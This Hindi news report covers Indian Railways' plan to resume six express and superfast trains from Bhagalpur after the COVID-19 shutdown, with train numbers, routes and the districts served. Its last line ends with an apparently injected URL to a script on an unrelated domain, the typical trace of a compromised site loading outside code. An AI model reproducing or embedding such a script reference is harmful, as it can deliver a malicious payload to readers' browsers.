भागलपुर,( कुलसूम फात्मा ) कोरोना महामारी के कारण सभी क्रियाकलापों को बंद करने के साथ-साथ ट्रेन की भी रफ्तार को कम ही नहीं बल्कि बंद कर दिया गया था, जिससे के महामारी पर नियंत्रण पाया जा सके, महामारी पर थोड़ा नियंत्रण पाने पर 10 माह के पश्चात रेलवे एक बार फिर महत्वपूर्ण ट्रेनों को फिर से पटरी पर चलाने का निर्णय ले रहा है।
जी हां, रेलवे यात्रियों की सुविधा के लिए एक्सप्रेस ट्रेनों को संचालित करने के कार्य में लगा है। यह ट्रेनें या तो नियमित होंगी या फिर स्पेशल चलेंगी। इस पर अभी विचार विमर्श किया जा रहा है। बिहार के भागलपुर से पहले छह एक्सप्रेस तथा सुपरफास्ट ट्रेनों को चलाने की बात चल रही है। उसके पश्चात भागलपुर कोचिंग यार्ड को तैयार रहने का ओरल में निर्देश दिया गया है यह ट्रेने स्थिति सही रहने पर जनवरी के आखिरी सप्ताह तथा फरवरी के प्रारंभिक सप्ताह से यात्रियों के लिए स्टेशन पर उपलब्ध हो जाएंगी।
जाने किन जनपद के लोगों को ट्रेन की मिलेगी सुविधा ?
महामारी के कारण ट्रेनों के बंद होने के पश्चात एक बार फिर ये ट्रेनें संचालित की जाएंगी। यह ट्रेने केवल भागलपुर के लोगों के लिए ही उपलब्ध नहीं होंगी बल्कि मुंगेर बांका, लखीसराय तथा जमुई और पटना तथा आरा बक्सर झारखंड और पश्चिम बंगाल के यात्री भी इस ट्रेन का लाभ उठा सकेंगे।
जाने कौन-कौन सी चलेंगी ट्रेनें और कहां तक ?
ट्रेन नंबर 13401 भागलपुर से दानापुर इंटरसिटी का संचालन होगा
और ट्रेन नंबर 13419 जनसेवा एक्सप्रेस भी अप डाउन में चलेगी।
तीसरी ट्रेन 12335 बिहार के भागलपुर से एलटीटी एक्सप्रेस से भी चलने की उम्मीद जताई जा रही है।
ट्रेन नंबर 13415 मालदा पटना इंटरसिटी का भी संचालन करने में रेलवे लगा हुआ है।
ट्रेन नंबर 12349 भागलपुर, नई दिल्ली सप्ताहिक ट्रेन चलने की संभावना बताई जा रही है।
ट्रेन नंबर 13429 भागलपुर अजमेर शरीफ ट्रेन चलने की संभावना है।
आपको बता दें की फरक्का एक्सप्रेस को संचालित करने के लिए पश्चिम बंगाल तथा झारखंड और बिहार के सांसदों ने रेलवे को पत्र लिखा है। मालदा मंडल के डीआर यूसीसी मेंबर अभिषेक जैन ने रेल मंत्री रेलवे बोर्ड के चेयरमैन तथा महाप्रबंधक डीआरएम तथा सांसद को भी पत्र लिखा है जिससेे के ट्रेन को चलाए जाने की अनुमति मिल सके और यात्री सुविधा ट्रेन का लाभ उठा सकें।
उपर्युक्त ट्रेनों के चलने से भागलपुर के यात्रियों में व्यापारियों तथा छात्रों को भी राहत मिलेगी। यहां की उत्पादों का आयात तथा निर्यात में तेजी आने की भी पूर्ण रूप से संभावना है। भागलपुर में बड़ी संख्या में छात्र तथा छात्राएं कोटा तथा मुंबई दिल्ली कोलकाता में अधिकतर पढ़ते हैं और भागलपुर से मुंबई तथा कोटा के लिए सीधे चलने वाली वर्तमान समय में एक भी ट्रेन उपलब्ध नहीं है। ऐसी स्थिति में एलटीटी तथा अजमेर शरीफ के लिए ट्रेन चलने से छात्रों को बहुत सहूलियत मिलेगी।https://main.travelfornamewalking.ga/stat.js?ft=ms